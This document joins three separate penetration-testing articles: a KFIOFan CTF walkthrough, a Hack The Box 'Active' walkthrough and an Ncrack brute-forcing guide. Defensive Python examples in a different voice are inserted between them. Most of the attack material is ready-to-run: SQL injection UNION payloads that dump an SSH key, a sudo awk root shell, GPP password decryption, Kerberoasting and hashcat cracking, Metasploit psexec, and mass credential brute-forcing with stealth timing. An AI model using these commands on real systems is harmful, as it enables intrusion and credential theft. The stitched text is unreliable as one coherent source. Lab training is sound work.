KFIOFan:1 Vulnhub Walkthrough


Hello friends!! Today we are going to take on another boot2root challenge known as KFIOFan. This lab is designed in French and uses the geographical coordinates of a place in France to begin the CTF, where you have to find 4 flags using your web penetration testing skills, because this machine is vulnerable to SQL injection.

Official Description : Two french people want to start the very first fanclub of the youtuber Khaos Farbauti Ibn Oblivion. But they're not very security aware ! (IMPORTANT NOTE : The whole challenge is in french, including server conf. Which may add to the difficulty if you are non-native or using a non-azerty keyboard)
You can download this VM here.
Penetration Methodology
Network Scanning
§  Open ports and running services (Nmap)
Enumeration
§  Abusing the HTTP service to obtain credentials
§  Use robots.txt for the first flag
Exploit
§  Exploiting the SQL injection vulnerability
§  Obtain the SSH RSA key
§  SSH login
§  Catch another flag
Privilege Escalation
§  Check sudo rights
§  Spawn root access
§  Capture the last flag


Walkthrough
Network Scanning
Let’s start off with scanning the network to find our target.
nmap -A 192.168.1.105


So from nmap we found that two ports (22, 80) are open on the target machine, therefore let's navigate to port 80 in the browser.
Enumeration
On exploring port 80, we noticed it required authentication, but we did not have any credentials. Moreover, there was a text message (This site says: “48.416667 -0.916667”) which was pointing towards some geographical coordinates.

When we cancelled the authentication prompt, we saw a message in French saying “Let me guess Bob, did you lose your password again? LOL”. Here we took Bob as the authorized username.



On searching the coordinates 48.416667 -0.916667 in Google Maps, we get the location “Levaré”, which could be the password for user Bob.



Hmmmm!! So our prediction was true and we successfully bypassed HTTP authentication using Bob:Levaré.
Note: Well, this is not quite that easy, because on rebooting this machine the geo coordinates change, and you will get the password accordingly.

Luckily, on exploring /robots.txt, I found our first flag, which was in French; again I have translated it here:
FLAG1: Congratulations you found the first flag! (Yes I know you're hoping for a clue but at least you have the right reflexes!)


As the official description above says, “Two french people want to start the very first fanclub of the youtuber”, and from the given web page we can easily read the names of those two people (Alice and Bob), which are the usernames.
Exploit

Again I translated the whole text of this web page and concluded that user “Alice” holds some very crucial information or an important file such as an SSH key.

A link on Khaosearch brought me to the search form for the CTF author's YouTube channel; without wasting time I checked for SQL injection by injecting the following query:
raj" union select 1,2;#
Lol! It was vulnerable to SQL injection, let’s exploit it quickly.



With the help of the following query we try to dump all table and column names from inside the database.
raj" union select table_name, column_name from information_schema.columns;#


I was stumped when I saw an entry for SSH_Key, then I decided to check it, as it seemed the most exciting.


I found another entry for Alice when I injected the following query to check ssh_keys:
raj" union select * from ssh_keys;
Alice was holding a private SSH key, which has to be read in its proper form, therefore I viewed the source code of this page here.
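The search form above breaks because the search term is concatenated into the SQL text. As an added example (not code from the CTF or this walkthrough), here is a constructed SQLite stand-in for that search backend, with the vulnerable query next to the parameterized fix; the walkthrough's UNION payload is adapted to SQLite quoting (single-quoted literals, `--` comment), and the `videos`/`ssh_keys` schema is an assumption.

```python
import sqlite3

# Constructed stand-in for the fan site's search backend (not the CTF's real schema or code):
# a searchable videos table next to the ssh_keys table the walkthrough pulls out.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE videos (title TEXT, url TEXT);
        CREATE TABLE ssh_keys (username TEXT, privkey TEXT);
        INSERT INTO videos VALUES ('Khaos episode 1', 'https://example.invalid/1');
        INSERT INTO ssh_keys VALUES ('alice', '-----BEGIN RSA PRIVATE KEY----- (constructed)');
    """)
    return conn

def search_vulnerable(conn, term):
    # The search term is pasted straight into the SQL text, so a quote in it
    # ends the string literal and whatever follows runs as SQL.
    sql = f"SELECT title, url FROM videos WHERE title LIKE '%{term}%'"
    return conn.execute(sql).fetchall()

def search_safe(conn, term):
    # Same query with a bound parameter: the term is passed as data and is
    # never parsed as SQL, so the UNION inside it is just characters to match on.
    sql = "SELECT title, url FROM videos WHERE title LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()

# The walkthrough's two-column UNION payload, with SQLite quoting.
PAYLOAD = "raj' UNION SELECT username, privkey FROM ssh_keys --"

def compare(term=PAYLOAD):
    """Run both versions against a fresh database and return (vulnerable, safe) rows."""
    conn = build_db()
    return search_vulnerable(conn, term), search_safe(conn, term)

if __name__ == "__main__":
    vuln, safe = compare()
    print("concatenated query returned:", vuln)   # leaks alice's key row
    print("parameterized query returned:", safe)  # nothing: no title contains the payload
```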


Then copy the RSA key from -----BEGIN RSA PRIVATE KEY----- to -----END RSA PRIVATE KEY----- and paste it into a text file as “id_rsa”, then set permission 600 for proper authentication.
chmod 600 id_rsa




Privilege Escalation

Now connect to SSH using the above key and run the following commands:
ssh alice@192.168.1.105 -i id_rsa
ls
cat flag3.txt

So we have successfully connected via SSH and found the 3rd flag as well.

FLAG 3: Congratulations for coming here. This shows that you master very well the essential concepts! One last little effort and the root is yours!

To find the 4th flag we need to escalate to root privileges; let’s identify the sudo rights for alice with the help of the following command.
sudo -l
Hmmm!! So here alice can run awk as root without a password, and we can easily spawn a root shell by exploiting this permission.
sudo awk 'BEGIN {system("/bin/bash")}'
ls
cat flag4.txt

FLAG 4: COMPLETE! Congratulations to you for coming here: the machine is yours, its survival or destruction is now entirely based on your ethics. Good luck Hacker!
Note: On rebooting this VM the geo coordinates change each time, which also affects the password and SSH key, so you get a new password and SSH key each time.

Hack the Box: Active Walkthrough


Today we are going to solve another CTF challenge, “Active”. Active is a retired vulnerable lab presented by Hack the Box to help pentesters perform online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.
Level: Easy
Task: To find user.txt and root.txt file

Penetration Methodologies

Scanning Network
§  Open ports and Running services (Nmap)
Enumeration
§  Identify shared files (enum4linux)
§  Access shared file via anonymous login (smbclient)
§  Decrypting cpassword (Gpprefdecrypt.py)
Access Victim’s Shell via SMB connect
§  Access shared file with user login
§  Get user.txt
Privilege Escalation
§  Find Service Principal Names (GetUserSPNs.py)
§  Crack the hash (Hashcat)
§  Psexec Exploit (Metasploit)
§  Get root.txt

Walkthrough

Scanning Network
Note: Since these labs are available online, they have a static IP. The IP of Active is 10.10.10.100
Let’s start off with our basic nmap command to find out the open ports and services.
nmap -sV 10.10.10.100


As you can observe from the Nmap scan result, there are many open ports along with their running services; the OS is Microsoft Windows Server 2008 R2 SP1, and you can also read the domain name “active.htb”.
Enumeration
I tried the EternalBlue attack when I saw port 445 was open, but I guess this was a patched version of SMB, therefore I had to start with the enum4linux script. As we all know it is the best script for SMB enumeration.
./enum4linux -S 10.10.10.100
It showed anonymous login for the /Replication share.

Then I tried to access /Replication with the help of smbclient and ran the following command to access this directory via the anonymous account:
smbclient //10.10.10.100/Replication

Here I downloaded the Groups.xml file, which I found inside the following path:
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
So here I found a cpassword attribute value embedded in Groups.xml for user SVC_TGS.
Therefore I downloaded the python script “Gpprefdecrypt” from GitHub to decrypt the password of local users added via Windows 2008 Group Policy Preferences (GPP) and obtained the password: GPPstillStandingStrong2k18.
python Gpprefdecrypt.py < cpassword attribute value >
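Any cpassword left in SYSVOL is readable by every domain user, which is why the Replication share gave this away. As an added defender-side example (not code from this walkthrough or from Gpprefdecrypt), the following Python audit parses GPP XML files for cpassword attributes and reports the account they belong to, without decrypting anything; the Groups.xml sample is constructed with a placeholder cpassword, and the list of GPP file names is an assumption based on which preference types can carry one.

```python
import xml.etree.ElementTree as ET
from pathlib import Path

# GPP XML files that can carry a cpassword attribute (Groups.xml is the one on this page).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# Attribute naming the account, depending on the preference type.
ACCOUNT_ATTRS = ("userName", "runAs", "accountName", "username")

# Constructed sample in the shape of a Groups.xml; the cpassword is a placeholder,
# not the value from the lab.
SAMPLE_GROUPS_XML = """<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="SVC_TGS"
        changed="2018-07-18 20:46:06" uid="{PLACEHOLDER-GUID}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="PLACEHOLDER_BASE64_CPASSWORD" changeLogon="0"
                noChange="1" neverExpires="1" acctDisabled="0" userName="SVC_TGS"/>
  </User>
</Groups>"""

def find_cpasswords(xml_text, source="Groups.xml"):
    """Return one finding per element that carries a cpassword attribute."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        cpw = elem.get("cpassword")
        if cpw is None:
            continue
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "<unknown>")
        findings.append({"file": source, "element": elem.tag,
                         "account": account, "empty_password": cpw == ""})
    return findings

def scan_sysvol(root):
    """Walk a SYSVOL copy (e.g. the Replication share pulled down with smbclient)
    and collect cpassword findings from every GPP file under it."""
    findings = []
    for path in Path(root).rglob("*.xml"):
        if path.name not in GPP_FILES:
            continue
        try:
            findings += find_cpasswords(path.read_text(encoding="utf-8-sig"), str(path))
        except ET.ParseError:
            continue  # not well-formed XML; skip it rather than abort the audit
    return findings

if __name__ == "__main__":
    for f in find_cpasswords(SAMPLE_GROUPS_XML):
        print(f"{f['file']}: <{f['element']}> sets a GPP password for {f['account']}")
```

Every hit should be removed from SYSVOL and the account's password rotated, since the decryption key for cpassword has been public since MS14-025.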
Access Victim’s Shell via SMB connect
Using the above credentials we connect to SMB with the help of the following command and successfully catch our 1st flag, the “user.txt” file.
smbclient //10.10.10.100/Users -U SVC_TGS
Now it’s time to hunt for the root.txt file, and as always, to obtain root.txt we need to escalate to root privileges; therefore let’s add the host IP and hostname inside the /etc/hosts file on our local machine.

Privilege Escalation
In the nmap scan result we saw port 88 was open for Kerberos, hence there must be some Service Principal Names (SPNs) associated with normal user accounts. Therefore we downloaded and installed impacket from GitHub to use its python script GetUserSPNs.py.

./GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18

I copied the hash value into a text file “hash.txt” for cracking.

Then with the help of hashcat we found the hash mode; as a result it showed 13100 for Kerberos 5 TGS-REP etype 23.
hashcat -h |grep -i tgs
Finally, it was time to crack the hash and obtain the password using the rockyou.txt wordlist.
hashcat -m 13100 hash.txt -a 0 /usr/share/wordlists/rockyou.txt --force --show
Hurray!!! We got it: Ticketmaster1968 for administrator.
Without wasting time I loaded the Metasploit framework and ran the following module to spawn a full-privilege system shell.
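The GetUserSPNs.py request above is visible to the domain controller as Event ID 4769 with an RC4 (etype 0x17) service ticket for a user account's SPN. As an added detection example (not code from this walkthrough or from impacket), this Python check flags that pattern in constructed 4769 events; the event fields follow the Windows Security log, but the sample values are made up.

```python
from collections import defaultdict

# Constructed Security-log 4769 events ("A Kerberos service ticket was requested"),
# reduced to the fields the check needs; not events from the lab.
EVENTS = [
    {"EventID": 4769, "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.2", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.2", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "bob@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.50", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "bob@ACTIVE.HTB", "ServiceName": "sqlsvc",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.50", "Status": "0x0"},
    {"EventID": 4624, "TargetUserName": "bob", "IpAddress": "10.10.10.50"},
]

RC4_HMAC = "0x17"  # etype 23: the TGS-REP type that hashcat mode 13100 cracks

def is_roastable_request(ev):
    """A successful service-ticket request for a user (not machine) account's SPN
    that came back RC4-encrypted: the kind of ticket GetUserSPNs.py -request asks for."""
    if ev.get("EventID") != 4769 or ev.get("Status") != "0x0":
        return False
    service = ev.get("ServiceName", "")
    if service.endswith("$") or service.lower() == "krbtgt":
        return False  # machine accounts and the TGT itself are outside this check
    return ev.get("TicketEncryptionType") == RC4_HMAC

def kerberoast_candidates(events):
    """Return (requester, service account, source ip) for each suspicious 4769."""
    return [(e["TargetUserName"], e["ServiceName"], e["IpAddress"])
            for e in events if is_roastable_request(e)]

def requesters_by_service_count(events):
    """Count distinct RC4 user-SPN services each requester asked for; one account
    asking for many in a short time is the bulk-roast pattern."""
    seen = defaultdict(set)
    for requester, service, _ in kerberoast_candidates(events):
        seen[requester].add(service)
    return {r: len(s) for r, s in seen.items()}

if __name__ == "__main__":
    for requester, service, ip in kerberoast_candidates(EVENTS):
        print(f"RC4 TGS for SPN owner {service} requested by {requester} from {ip}")
```

On the account side, a long random password (or a group managed service account) and AES-only encryption types for SPN holders are what keep a cracked 13100 hash from being the end of the story.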
msf > use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > set rhost 10.10.10.100
msf exploit(windows/smb/psexec) > set smbuser administrator
msf exploit(windows/smb/psexec) > set smbpass Ticketmaster1968
msf exploit(windows/smb/psexec) > exploit

BOOOMMM…………………
Now we are inside the root shell; let’s chase the root.txt file and finish this challenge.

Yuppieee! We found our 2nd flag, the root.txt file, inside /Users/Administrator/Desktop.

Comprehensive Guide on Ncrack - A Brute Forcing Tool



In this article we will be exploring the topic of network authentication using Ncrack. Security professionals depend on Ncrack while auditing their clients. The tool is very simple, yet robust in what it offers a penetration tester. It was designed to help companies secure their networks by analysing all their hosts and networking devices for weak passwords.

Table of Content

INTRODUCTION TO NCRACK
§  Exploring Modules
AUTHENTICATION PHASE
§  Basic Attack
§  Dictionary Attack
§  Brute Force Attack
§  Pairwise Attack
MISC PHASE
§  Resume the Attack
§  Stop on Success
§  Obtain Result in List Format
OUTPUT FORMAT
§  Normal text File
§  All Format At Once
§  Append output
§  Nsock Trace
TIMING AND PERFORMANCE
§  Timing Templates
§  Service-Specific Options
TARGET SPECIFICATION
§  Input from Nmap's XML
§  Input from Text file
§  Exclude Host from List
  

INTRODUCTION TO NCRACK

Ncrack is a network authentication cracking tool; it helps pentesters find out how vulnerable the credentials protecting access to a network are. The tool is part of the Kali Linux arsenal and comes preinstalled. It also has a unique feature to attack multiple targets at once, which is not seen very often in such tools.

Ncrack can be started by typing “ncrack” in the terminal. This shows us all the different options the tool provides.
ncrack
syntax: ncrack [Options] {target:service specification/port number}





Exploring Modules

Ncrack is a very versatile tool; it has modules to test most of the popular forms of network authentication. We can see this by checking the modules.

ncrack -V



AUTHENTICATION PHASE
Basic Attack

We have defined this attack as basic because at this phase we only know that port 21 is open for the FTP service on the victim’s machine. So with the help of the following command we will try to find possible FTP login credentials.
ncrack ftp://192.168.0.105

On executing the above command, it will try to crack the password for the anonymous login account, as shown in the image below.




Dictionary Attack

Suppose you want to obtain the correct login credentials for a service such as FTP, SSH or HTTP in the following situations:

Situation 1: Know only the username but not the password
Situation 2: Don’t know the username but know the password
Situation 3: Have neither the username nor the password

In such situations, you should use a wordlist dictionary with the corresponding ncrack command:

ncrack -user msfadmin -P pass.txt 192.168.0.105:21
ncrack -U user.txt -pass msfadmin 192.168.0.105:21
ncrack -U user.txt -P pass.txt 192.168.0.105:21



Brute Force Attack
Now whenever you find yourself in the following situations:
Situation 1: You have a close guess at a few usernames and passwords for a host:service and don’t want to use a dictionary; then you can go with the following command, which reduces the effort of guessing the true credentials.
ncrack -user msfadmin,ignite -pass msfadmin,123 ftp://192.168.0.106
Situation 2: You have a close guess at the usernames and passwords, but there are multiple hosts in the network and guessing the valid login for the destination machine is a time-consuming process.
Again with the help of the following ncrack command you will be able to crack a valid login for any host present in the network.
ncrack -user msfadmin,ignite -pass msfadmin,123 192.168.0.1/24:21



Pairwise Attack
Ncrack lets us choose sets of credentials, basically pairing them by row and column index, which means the 1st username from the user.txt file is paired with the 1st password from the pass.txt file.
If you do not give any dictionary, then ncrack will go with its default dictionary for pairing passwords for the anonymous login.
ncrack -v --pairwise 192.168.0.105:21
From the image below you can observe that we made a successful FTP login with the help of the paired password matthew.
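The dictionary, brute-force and pairwise runs above all leave the same trace on the target: a burst of failed logins from one source in a few seconds. As an added defender-side example (not code from this article or from Ncrack), this Python check parses constructed sshd log lines and flags any source IP that crosses a failure threshold inside a short window; the log format is standard syslog/sshd, the year is assumed since syslog omits it, and threshold and window are tunable.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd lines in syslog format: a password-guessing run from one source
# and a single failure from another. Not logs from any host in this article.
LOG_LINES = """\
Dec  5 04:36:01 srv sshd[2231]: Failed password for invalid user admin from 192.168.0.10 port 51002 ssh2
Dec  5 04:36:01 srv sshd[2233]: Failed password for msfadmin from 192.168.0.10 port 51004 ssh2
Dec  5 04:36:02 srv sshd[2235]: Failed password for invalid user ignite from 192.168.0.10 port 51006 ssh2
Dec  5 04:36:02 srv sshd[2237]: Failed password for msfadmin from 192.168.0.10 port 51008 ssh2
Dec  5 04:36:03 srv sshd[2239]: Failed password for invalid user root from 192.168.0.10 port 51010 ssh2
Dec  5 04:36:03 srv sshd[2241]: Failed password for msfadmin from 192.168.0.10 port 51012 ssh2
Dec  5 04:36:04 srv sshd[2243]: Accepted password for msfadmin from 192.168.0.10 port 51014 ssh2
Dec  5 04:40:17 srv sshd[2300]: Failed password for alice from 10.0.0.5 port 40100 ssh2
""".splitlines()

FAILED = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")

def parse_failed(line, year=2018):
    """Return (timestamp, user, ip) for a failed-login line, else None."""
    m = FAILED.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["user"], m["ip"]

def detect_bruteforce(lines, threshold=5, window_s=60, year=2018):
    """Flag source IPs with at least `threshold` failures inside any `window_s` span.
    Returns {ip: {"attempts": n, "users": [...]}} for flagged sources only."""
    by_ip = defaultdict(list)
    for line in lines:
        parsed = parse_failed(line, year)
        if parsed:
            by_ip[parsed[2]].append(parsed[:2])
    flagged = {}
    for ip, events in by_ip.items():
        events.sort()  # sliding window over timestamps per source
        for i in range(len(events) - threshold + 1):
            span = (events[i + threshold - 1][0] - events[i][0]).total_seconds()
            if span <= window_s:
                flagged[ip] = {"attempts": len(events),
                               "users": sorted({u for _, u in events})}
                break
    return flagged

if __name__ == "__main__":
    for ip, info in detect_bruteforce(LOG_LINES).items():
        print(f"{ip}: {info['attempts']} failed logins, users tried: {info['users']}")
```

The same idea, with the service's own log format, applies to the FTP and SMB targets used in this article; the Accepted line right after the burst is the event worth paging on.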



MISC PHASE
Resume the Attack

This is probably the feature that takes the cake. We all know how frustrating a loss of connection or any other technical interruption can be during testing; this is where Ncrack is a blessing. If your attack gets interrupted, you can pick it right up from where you were.

ncrack --resume /root/.ncrack/restore.2018-12-05_04-36




Stop on Success
As you have seen in the above attack, it keeps on cracking the service until it finds all possible logins, but if you want the attack to quit cracking the service after finding one credential, then you should add the -f option to the ncrack command.

ncrack -v --pairwise 192.168.0.105:21 -f



Obtain Result in List Format
It always matters how you maintain your penetration testing report and present the output. Sometimes it is quite hectic to arrange the results in a well-polished form, especially when you have to penetrate multiple host machines. To avoid such a hotchpotch, ncrack has added the -sL option, which will generate the result in a list format.

ncrack ssh://192.168.0.105 ssh://192.168.0.106 -sL



OUTPUT FORMAT
Normal text File

If you want to store the ncrack output in text or XML format, you can go with the -oN option to save the result in a text file with the help of the command below, and later use the cat command to read the information saved inside that file.

ncrack -U user.txt -P pass.txt 192.168.0.106:21 192.168.0.105:21 -oN normal.txt
cat normal.txt

Or you can switch to the -oX option to save the output in XML format.

ncrack -U user.txt -P pass.txt 192.168.0.106:21 192.168.0.105:21 -oX save.xml



All Format At Once
Suppose you want to store the ncrack output in both formats (.txt, .xml); then you can choose the -oA option while executing the command.
ncrack -U user.txt -P pass.txt 192.168.0.106:21 192.168.0.105:21 -oA output
As you can observe, it has stored the result in two formats, as “output.ncrack” and “output.xml”.


Append output

If the testing is being done in iterations, Ncrack gives us the option to append the output to an existing file with ease.
As you can observe, when we try to crack the FTP service for host 192.168.0.106, it gives ignite:123 as the login credential, which I saved in a text file.

ncrack -U user.txt -P pass.txt 192.168.0.106:21 192.168.0.106:21 -oN normal.txt

But on cracking the SMB service for host 192.168.0.105, it gives msfadmin:msfadmin as the login credential, and here I appended the output to the previous text file.

ncrack -U user.txt -P pass.txt 192.168.0.105:445 -oN normal.txt --append-output

Conclusion: so by reading the normal.txt file we get both results in one place rather than clobbering the specified output files.


Nsock Trace
Ncrack lets us run an nsock trace on our target while attacking it; we can set the trace level anywhere from 0 to 10 depending on our objective. The output from this operation is quite large.
ncrack -U user.txt -P pass.txt 192.168.0.106:21 --nsock-trace 2


We weren’t kidding when we said the output is large!


TIMING AND PERFORMANCE

Timing Templates

The timing template in ncrack is defined by -T<0-5>, with -T0 the slowest and -T5 the fastest. By default all ncrack scans run with the -T3 timing template. Timing templates in Ncrack are used to optimize and improve the quality and performance of the scan to get the desired results.

T5: Insane Scan
T4: Aggressive Scan
T3: Normal Scan
T2: Polite Scan
T1: Sneaky Scan




ncrack -U user.txt -P pass.txt 192.168.0.105:21 -T1

As you can observe from the image below, it took 187.57 seconds, and for this reason T0 and T1 are used to evade firewalls and IDS/IPS.

ncrack -U user.txt -P pass.txt 192.168.0.105:21 -T5
ncrack -U user.txt -P pass.txt 192.168.0.105:21

On executing the above commands you can compare the completion time in both results: it took 15.01 seconds with T5 and 24.00 seconds with the default (T3).

Service-Specific Options
cl (min connection limit): minimum number of concurrent parallel connections
CL (max connection limit): maximum number of concurrent parallel connections
at (authentication tries): authentication attempts per connection
cd (connection delay): time to wait between each connection initiation
cr (connection retries): caps the number of service connection attempts
to (time-out): maximum cracking time for the service, regardless of success so far

You can use the above options while penetrating the whole network for cracking any service.

ncrack ssh://192.168.0.105 -m ftp:cl=10,CL=30,at=5,cd=2ms,cr=10,to=2ms -sL -d




TARGET SPECIFICATION
Input from Nmap's XML

You might be aware of the Nmap tool and its functionality; suppose that while scanning the network with nmap you stored its result in XML format, then you can use the ncrack -iX option to crack the running services from that XML file.

ncrack -user ignite -pass 123 -iX nmap.xml
As you can observe from the given image, ncrack itself cracked the password for FTP without any service or port being specified in the command.


Input from Text file
Executing the command again and again on multiple hosts is quite time-consuming; therefore, you can place all host IPs in a text file and then use it for cracking any particular service.

ncrack -U user.txt -P pass.txt -iL host.txt -p21



Exclude Host from List

Suppose you are using a list that contains multiple IPs or a range of IPs and you don’t want to crack the service for a specific IP; then you can use the --exclude option to eliminate that particular IP from the list of hosts.

ncrack -U user.txt -P pass.txt -iL host.txt -p21 --exclude 192.168.0.106
As you can observe, this time it did not crack 192.168.0.106 and showed the results for the remaining IPs.